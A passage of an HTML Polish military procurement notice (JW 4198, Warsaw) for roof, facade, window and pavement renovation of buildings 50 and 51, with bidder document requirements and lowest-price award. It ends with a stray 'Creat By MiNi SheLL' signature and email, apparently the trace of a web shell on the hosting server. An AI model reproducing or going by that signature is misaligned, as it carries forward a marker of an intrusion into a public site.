8. Aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzającego, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne  i społeczne, lub potwierdzenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
9. Aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt. 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
10. Aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
11. Oświadczenie Wykonawcy o przynależności do grupy kapitałowej (art. 24 ust. 2 pkt 5 ustawy Prawo zamówień publicznych)
12. Pełnomocnictwo do podpisania oferty, jeśli to nie wynika z innych dokumentów dołączonych do oferty</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.1blot.sp.mil.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Jednostka Wojskowa 4198,   00-909 Warszawa ul. Żwirki i Wigury 1C, 
budynek 50, pok. 4.</p><p><b>IV.4.2) Opis potrzeb i wymagań zamawiającego określonych w sposób umożliwiający przygotowanie się wykonawców do udziału w dialogu konkurencyjnym lub informacja o sposobie uzyskania tego opisu:</b> nie dotyczy.</p><p><b>IV.4.3) Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:</b> nie dotyczy.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.02.2014 godzina 10:00, miejsce: Jednostka Wojskowa 4198,   00-909 Warszawa ul. Żwirki i Wigury 1C, 
budynek 51,  Kancelaria..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie nr 1 - Budynek 51 - wymiana pokrycia dachowego, remont elewacji i wejść do budynku oraz remont ciągu komunikacyjnego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> -   wymiana obróbek blacharskich murów ogniowych ,okapów, kołnierzy, gzymsów, pasy
nadrynnowe i podrynnowe oraz  kominów na blachy proszkowo malowane 
   -   naprawa pokryć dachowych oraz położenie nowej warstwy papy termozgrzewalnej na ocieplenie dachu styropianem grubości 12 cm. 
   -   obróbek wywiewek kanalizacyjnych oraz założenie kratki w kominach wentylacyjnych 
   -   wymiana rynny i rur spustowych  z PCV na rynny i rur z blachy powlekanej 
   -   wymiana zbiorniczka przy rynnach
   -   uzupełnienie tynków w uszkodzonych kominów oraz jednokrotne malowanie
   -   uzupełnienie zbrojonych czapek kominowych z betonu - założenia kratek went.
   -   wymiana instalacji odgromowej na dachu wraz ze zwodami- wykonać pomiary
   -   miniowanie i malowanie dwukrotne drabiny stalowej - właz na dach
   -    zainstalować 
Remont elewacji w budynku nr 51 obejmuje:
   -   przygotowanie starego podłoża pod docieplenie - oczyszczenie mechaniczne i zmycie
   -   dwukrotne gruntowanie emulsją
   -   wyprawa elew. cienkowarstwowa z akrylowych tynków  dekor o fakturze rustykalnej gr.3mm
   -   cokół wykonać z tynku mozaikowego 
   -   dwukrotne malowanie elewacji - cokół 
   -   wymiana opaski z płyt chodnikowych jak przy bud.50
   -   dwukrotnie malowanie farbą olejną krat i siatek zewnętrznych 
   -   jednokrotnie malowanie farbą olejną parapetów zewnętrznych 
   -   dwukrotnie malowanie farbą olejną daszku nad wyjściem 
   -   uzupełnienie tynków przy gzymsach i elewacji 
   -   dwukrotnie malowanie elewacji
   -   wymiana terakoty na schodach zewn. jak przy bud.50
Remont ciągów komunikacyjnych przy bud. 50,51 obejmuje:
   -   wymiana nawierzchni ,rozebranie obrzeża 
   -   przygotowanie terenu  pod kostkę brukową
   -   ułożenia nowej kostki i obrzeży
   -   wymiana pokrywy żelbetowej i ramy studni.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.44.30.00-4, 45.26.19.10-6, 45.26.19.20-9, 45.43.11.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 120.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie nr 2 - Budynek 50 - wymiana pokrycia dachowego, remont elewacji, wymiana stolarki okiennej, remont wejść i balustrad.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Remont dachu w budynku nr 50 obejmuje: 
   -   rozbiórka pokrycia z papy - wywóz i utylizacja  
   -   rozebranie obróbek blacharskich murów ogniowych, okapów, kołnierzy, gzymsów  itp. 
   -   rozebranie rynien i rur spustowych
   -   wymiana murłaty pod  renajzy rynien  
   -   rozebranie izolacji dachu z płyt pilśniowych oraz rozkruszonej szlichty - wywiezienie 
   -   obróbki blacharskie zdać do magazynu JW. 4198 
   -   krycie papą termozgrzewalną -dwukrotnie- wraz z ociepleniem dachu płytami styropianowymi  obustronne obklejone papą   PS20SE  grub.12cm
   -   warstwy wyrównawcze pod ocieplenie ze styropianu na  zaprawy cementowej - 4cm
   -   obróbki blacharskie, pasy rynnowe również przy kominach -wydry- z blachy powlekanej 
   -   rynny dachowe , rury spustowe oraz zbiorniczki przy rynnach z blachy powlekanej 
   -   naprawa uszkodzonej powierzchni kominów oraz czapki 
   -   obróbek wywiewek kanalizacyjnych oraz założenie kratek w kominach wentylacyjnych
   -   wymiana instalacji odgromowej na dachu wraz ze  zwodami - wykonać pomiary
   -   zainstalować kominki wentylacyjne na połaci  dachu.    
Remont elewacji w budynku nr 50 obejmuje:
   -   przygotowanie starego podłoża pod docieplenie- oczyszczenie mechaniczne i zmycie       
   -   dwukrotne gruntowanie emulsją 
   -   wyprawa elewacyjna cienkowarstwowa z akrylowych tynków dekor o fakturze rustykalnej gr.3mm
   -   cokół wykonać z tynku mozaikowego  
   -   dwukrotne malowanie elewacji
   -   wymiana  opaski z płyt chodnikowych 35x35x6  wraz z obrzeżem betonowym  o wymiarach 100x 20x 6
   -    wymiana terakoty na schodach zewnętrznych na płyty betonowe - imitacja  terakoty  
Wymiana okien i drzwi w budynku nr 50 obejmuje:
   -   wymiana okien - 87e szt.-
   -   obróbki ( parapetów zewn.) z blachy  w kolorze brąz oraz obróbka glifów obustronnie
   -   dwukrotnie malowanie farbą olejną krat i siatek zewnętrznych 
   -   dwukrotnie malowanie farbą olejną daszek nad wyjściem 
   -   dwukrotnie malowanie farbą olejną drabiny włazowej na dach oraz osłony
   -   wymiana drzwi wejściowych  zewnętrzne z profili aluminiowych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.42.11.32-8, 45.26.10.00-4, 45.44.30.00-4, 45.43.11.00-8, 45.26.19.10-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 120.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com